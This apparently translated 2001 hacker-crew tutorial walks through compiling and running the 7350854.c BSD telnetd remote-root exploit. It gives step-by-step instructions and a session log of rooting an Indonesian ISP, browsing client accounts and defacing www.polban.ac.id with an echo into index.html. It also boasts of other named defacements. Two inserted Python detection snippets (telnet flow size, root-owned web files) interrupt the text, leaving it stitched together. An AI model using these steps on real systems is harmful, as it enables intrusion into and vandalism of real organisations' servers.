Title = Remote root Telnetd
* bug found by scut 2001/06/09
further research by smiler, zip, lorian and me.
thanks to zip's cool friend for giving me a testbed to play on
tested against: BSDI BSD/OS 4.1
NetBSD 1.5
FreeBSD 3.1
FreeBSD 4.0-REL
FreeBSD 4.2-REL
FreeBSD 4.3-BETA
FreeBSD 4.3-STABLE
FreeBSD 4.3-RELEASE
AUTHOR = JoeGoeL aka CyberRioT of MedanHacking
File = Private! only crew
Date = 2 August 2001
Credit = TESO TEAM SECURITY
Greetz= Cronost,Crafter`13,r3v0lt,dis0rder,Tua-Xiong,Seven_Fly,Breng-Sex,LuVcris,
tapuz,Joe-Black,w|p,StripCode,Yourname
WOH(VAndal,[RaFa],FonE_TonE,r00t,n0|d,Nu|l)
FUCk = INDONESIAN MILITARY
sploit = 7350854.c www.hack.co.za
Following the successful rooting of www.melsa.net.id, a provider located in Bandung, and the defacement of the sites www.bappeda-bandung.go.id, www.polban.ac.id, www.bankbali-bdg.co.id, www.sidola.com and others that are clients of that ISP,
let's begin...
1. First, get a Unix shell, any kind (Linux, FreeBSD, SCO, SunOS, etc.),
then upload the file 7350854.c from www.hack.co.za to that shell, then
compile it
ex. # gcc -o bsd 7350854.c
2. Scan for hosts running a BSD variant as listed above
3. Scan ports with a tool that can be found at packetstormsecurity.org; look for pscan.c
4. If the open port is port 23 (telnetd), it can possibly be exploited for root
5. Run the exploit
ex. # ./bsd www.target.com
this is an example of one I have exploited
[wbones@dblab Tool]$ ./bsd www.polban.ac.id
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
#############################################################################
ok baby, times are rough, we send 16mb traffic to the remote
telnet daemon process, it will spill badly. but then, there is no
other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots
percent |--------------------------------------------------------| ETA |
99.37% |....................................................... | 00:00:06 |
:: wait until 100%, then it will look like this:
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
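From the monitoring side, the tool's own banner above gives a usable signal: it announces about 16 MB of client-to-server traffic to the telnet daemon, whereas a normal telnet session carries only keystrokes in that direction. The following is an added example, not part of the original write-up; the flow-record layout, the sample records and the 1 MiB threshold are assumptions.

```python
# Constructed sample (not from the page): one finished TCP session per line as
# start_time src dst dst_port bytes_client_to_server bytes_server_to_client
SAMPLE_FLOWS = """\
2001-08-01T06:02:11 192.0.2.10 198.51.100.5 23 1840 25310
2001-08-01T06:20:45 203.0.113.77 198.51.100.5 23 16790000 4100
2001-08-01T06:21:03 192.0.2.44 198.51.100.5 80 912 48211
2001-08-01T06:25:30 192.0.2.10 198.51.100.5 23 not-a-number 10
"""

TELNET_PORT = 23
# Assumed threshold: interactive telnet input is typed keystrokes, so 1 MiB
# of client-to-server data in one session is already far outside normal use.
MAX_CLIENT_BYTES = 1024 * 1024


def suspicious_telnet_flows(text, limit=MAX_CLIENT_BYTES):
    """Return (hits, malformed_count) for telnet sessions with oversized client input."""
    hits, malformed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            # A wrong field count or a non-numeric counter both raise ValueError.
            start, src, dst, port, c2s, s2c = line.split()
            port, c2s, s2c = int(port), int(c2s), int(s2c)
        except ValueError:
            malformed += 1  # count bad records instead of silently dropping them
            continue
        if port == TELNET_PORT and c2s > limit:
            hits.append({
                "start": start, "src": src, "dst": dst,
                "client_bytes": c2s,
                # inbound/outbound ratio: normal telnet is dominated by server output
                "ratio": round(c2s / max(s2c, 1), 1),
            })
    return hits, malformed


if __name__ == "__main__":
    found, bad = suspicious_telnet_flows(SAMPLE_FLOWS)
    for h in found:
        print("ALERT", h["start"], h["src"], "->", h["dst"], h["client_bytes"], "bytes in")
    print("malformed records:", bad)
```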
:: when it looks like this, press enter
command: ��%
ls -al
total 19047
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 .
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 ..
-rw-r--r-- 2 root wheel 658 Nov 20 2000 .cshrc
-rw-r--r-- 2 root wheel 251 Nov 20 2000 .profile
-r--r--r-- 1 root wheel 4735 Nov 20 2000 COPYRIGHT
drwxr-xr-x 2 root wheel 1024 Jun 20 02:21 bin
drwxr-xr-x 3 root wheel 512 Jun 20 02:26 boot
drwxr-xr-x 2 root wheel 512 Jun 19 23:57 cdrom
lrwx------ 1 root wheel 11 Jul 31 15:58 compat -> /usr/compat
drwxr-xr-x 3 root wheel 13824 Jul 31 21:01 dev
drwxr-xr-x 2 root wheel 512 Jun 19 23:57 dist
drwxr-xr-x 15 root wheel 2560 Aug 1 06:00 etc
drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 home
-r-xr-xr-x 1 root wheel 2086844 Jul 31 20:37 kernel
-r-xr-xr-x 1 root wheel 3258128 Nov 20 2000 kernel.GENERIC
-r-xr-xr-x 1 root wheel 2062958 Jun 23 11:24 kernel.old
-r-xr-xr-x 1 root wheel 2062958 Jun 23 10:51 kernel.prev
drwxr-xr-x 2 root wheel 512 Nov 20 2000 mnt
drwxr-xr-x 2 root wheel 3072 Jul 31 20:37 modules
drwxr-xr-x 2 root wheel 3072 Jun 20 11:37 modules.old
-rw-r--r-- 1 root wheel 91395 Jun 25 11:33 po-mode.el
dr-xr-xr-x 1 root wheel 512 Aug 1 06:29 proc
-rw------- 1 root wheel 97360 Jul 31 15:59 restoresymtable
drwxr-xr-x 5 root wheel 512 Aug 1 05:30 root
drwxr-xr-x 2 root wheel 2048 Jun 20 02:24 sbin
drwxr-xr-x 4 root wheel 1024 Jun 19 23:57 stand
lrwx------ 1 root wheel 11 Jul 31 15:58 sys -> usr/src/sys
lrwx------ 1 root wheel 8 Jul 31 15:58 tmp -> /var/tmp
drwxr-xr-x 14 root wheel 512 Jun 28 17:41 usr
drwxr-xr-x 4 root wheel 512 Jun 22 10:22 usr2
drwxr-xr-x 4 root wheel 512 Jun 26 11:30 usr3
drwxr-xr-x 18 root wheel 512 Jun 20 00:22 var
:: we succeeded!!!!!!!!!!
who am i
root tty?? Aug 1 06:29
uname -a
FreeBSD www3.melsa.net.id 4.3-STABLE FreeBSD 4.3-STABLE #4: Tue Jul 31 20:36:18 JAVT 2001 root@www3.melsa.net.id:/usr/src/sys/compile/WWW3 i386
:: got a root shell on the box
:: look for its index.html, usually in the home/www directory
cd home
ls -al
total 12
drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 .
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 ..
lrwx------ 1 root wheel 16 Jul 31 15:58 abadi -> /usr2/home/abadi
lrwx------ 1 root wheel 25 Jul 31 15:58 accounting.csb -> /usr3/home/accounting.csb
lrwx------ 1 root wheel 18 Jul 31 15:59 adm.csb -> /usr3/home/adm.csb
lrwx------ 1 root wheel 16 Jul 31 15:58 admin -> /usr2/home/admin
lrwx------ 1 root wheel 22 Jul 31 15:58 admin.iklan -> /usr3/home/admin.iklan
lrwx------ 1 root wheel 26 Jul 31 15:58 akunting.bpromo -> /usr3/home/akunting.bpromo
lrwx------ 1 root wheel 26 Jul 31 15:59 al_reda.gemafia -> /usr3/home/al_reda.gemafia
lrwx------ 1 root wheel 18 Jul 31 15:59 animbus -> /usr2/home/animbus
lrwx------ 1 root wheel 17 Jul 31 15:59 anzana -> /usr2/home/anzana
lrwx------ 1 root wheel 20 Jul 31 15:59 apep.reka -> /usr3/home/apep.reka
lrwx------ 1 root wheel 19 Jul 31 15:59 aprotech -> /usr2/home/aprotech
lrwx------ 1 root wheel 15 Jul 31 15:59 aris -> /usr2/home/aris
lrwx------ 1 root wheel 23 Jul 31 15:59 artforum.bae -> /usr3/home/artforum.bae
lrwx------ 1 root wheel 20 Jul 31 15:59 askhaindo -> /usr2/home/askhaindo
lrwx------ 1 root wheel 14 Jul 31 15:59 bae -> /usr2/home/bae
lrwx------ 1 root wheel 22 Jul 31 15:59 baligarment -> /usr2/home/baligarment
lrwx------ 1 root wheel 23 Jul 31 15:59 bankbali-bdg -> /usr2/home/bankbali-bdg
lrwx------ 1 root wheel 18 Jul 31 15:59 bappeda -> /usr2/home/bappeda
lrwx------ 1 root wheel 17 Jul 31 15:59 bening -> /usr2/home/bening
lrwx------ 1 root wheel 24 Jul 31 15:59 benny.bethany -> /usr3/home/benny.bethany
lrwx------ 1 root wheel 21 Jul 31 15:59 bethanydoa -> /usr2/home/bethanydoa
lrwx------ 1 root wheel 22 Jul 31 15:59 bhima.topaz -> /usr3/home/bhima.topaz
lrwx------ 1 root wheel 15 Jul 31 15:59 bhtv -> /usr2/home/bhtv
lrwx------ 1 root wheel 26 Jul 31 15:59 bidang3.bappeda -> /usr3/home/bidang3.bappeda
lrwx------ 1 root wheel 26 Jul 31 15:59 bidang5.bappeda -> /usr3/home/bidang5.bappeda
lrwx------ 1 root wheel 18 Jul 31 15:59 bigfash -> /usr2/home/bigfash
lrwx------ 1 root wheel 15 Jul 31 15:59 bita -> /usr2/home/bita
lrwx------ 1 root wheel 18 Jul 31 15:59 bowling -> /usr2/home/bowling
lrwx------ 1 root wheel 19 Jul 31 15:59 boy.reka -> /usr3/home/boy.reka
lrwx------ 1 root wheel 17 Jul 31 15:59 bpromo -> /usr2/home/bpromo
lrwx------ 1 root wheel 23 Jul 31 15:59 bptc.bethany -> /usr3/home/bptc.bethany
lrwx------ 1 root wheel 19 Jul 31 15:59 bratatex -> /usr2/home/bratatex
lrwx------ 1 root wheel 22 Jul 31 15:59 budi.weaver -> /usr3/home/budi.weaver
lrwx------ 1 root wheel 26 Jul 31 15:59 buletin.bethany -> /usr3/home/buletin.bethany
lrwx------ 1 root wheel 17 Jul 31 15:59 busana -> /usr2/home/busana
lrwx------ 1 root wheel 18 Jul 31 15:59 cci-bdg -> /usr2/home/cci-bdg
lrwx------ 1 root wheel 15 Jul 31 15:59 cela -> /usr2/hom
:: see, there are polban, bappeda, bankbali-bdg, bethanydoa, etc., which are websites
:: then change to the polban directory
cd polban
cd webpages
ls -al
total 34
drwxr-xr-x 10 polban corp 512 Aug 1 04:43 .
drwxr-xr-x 4 polban corp 512 May 22 2000 ..
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _borders
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _derived
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _fpclass
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _overlay
drwxr-xr-x 2 polban corp 512 Jun 21 15:16 _private
drwxr-xr-x 3 polban corp 512 Jun 21 15:18 _themes
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _vti_pvt
drwxr-xr-x 2 polban corp 512 Jun 21 15:17 images
-rw-r--r-- 1 root corp 75 Aug 1 04:43 index.html
-rw-r--r-- 1 polban corp 992 Jun 21 15:18 index.old
-rw-r--r-- 1 root corp 167 Aug 1 04:00 medan.htm
-rw-r--r-- 1 root corp 70 Aug 1 03:45 read.htm
-rw-r--r-- 1 root corp 77 Aug 1 03:47 surat.htm
-rw-r--r-- 1 root corp 117 Aug 1 03:54 warna.htm
-rw-r--r-- 1 root corp 18 Aug 1 03:52 yoyo
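The listing above already shows what a web-root integrity check would catch: every original entry belongs to the site account polban, while the files written during the intrusion belong to root. The following is an added example, not part of the original write-up; it parses the same `ls -al` output (copied from the page) and flags entries whose owner differs from the owner of the directory itself. The function names are hypothetical.

```python
# Listing copied from the page (the polban webpages directory).
LISTING = """\
total 34
drwxr-xr-x 10 polban corp 512 Aug 1 04:43 .
drwxr-xr-x 4 polban corp 512 May 22 2000 ..
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _borders
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _vti_pvt
drwxr-xr-x 2 polban corp 512 Jun 21 15:17 images
-rw-r--r-- 1 root corp 75 Aug 1 04:43 index.html
-rw-r--r-- 1 polban corp 992 Jun 21 15:18 index.old
-rw-r--r-- 1 root corp 167 Aug 1 04:00 medan.htm
-rw-r--r-- 1 root corp 70 Aug 1 03:45 read.htm
-rw-r--r-- 1 root corp 77 Aug 1 03:47 surat.htm
-rw-r--r-- 1 root corp 117 Aug 1 03:54 warna.htm
-rw-r--r-- 1 root corp 18 Aug 1 03:52 yoyo
"""


def parse_ls(text):
    """Parse `ls -al` lines into dicts; skips 'total' and anything malformed."""
    entries = []
    for line in text.splitlines():
        f = line.split(None, 8)  # name is field 9 and may contain spaces
        if len(f) < 9 or f[0][0] not in "-dlbcps" or not f[4].isdigit():
            continue
        entries.append({
            "type": f[0][0], "owner": f[2], "group": f[3], "size": int(f[4]),
            "mtime": " ".join(f[5:8]),
            "name": f[8].split(" -> ")[0],  # drop symlink target if present
        })
    return entries


def foreign_owned(entries):
    """Return (directory owner, entries not owned by that account)."""
    dir_owner = next((e["owner"] for e in entries if e["name"] == "."), None)
    if dir_owner is None:
        raise ValueError("listing has no '.' entry to take the expected owner from")
    odd = [e for e in entries
           if e["name"] not in (".", "..") and e["owner"] != dir_owner]
    return dir_owner, odd


if __name__ == "__main__":
    owner, odd = foreign_owned(parse_ls(LISTING))
    for e in odd:
        print(f"{e['name']}: owned by {e['owner']}, expected {owner}, mtime {e['mtime']}")
```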
:: it turns out the index is located here....
:: do the deface
) LoL heheheheh you pig wepe, don't you bother my nancy!!! (a little warning for those who often meddle)
::: let's deface!!!!!!!!
echo " JoeGoeL,Cronost,Crafter`13,r3v0lt,Tua-Xiong and dis0rder own U poltek Bandung Find Us at Medanhacking on Irc.dal.net greetz All Medanhacking Crew " > index.html
:: done!!! open www.polban.ac.id, it will look like the above
:: below are the ones I defaced
:: to return to our shell, press Ctrl+C
[wbones@dblab Tool]$
::: Ok see Ya Viva MedanHacking Crew find it http://medanhacking.has.it
::: To Romi aka Seven_Fly, how about the Linux and Perl books? Have they arrived yet?
::: To dis0rder, please translate this into English and Hebrew!!!!!!!!!!!!
Copyright JoeGoeL aka CyberRioT, CyberRioT@apexmail.com 2001
see you in the next tutorial!!!!!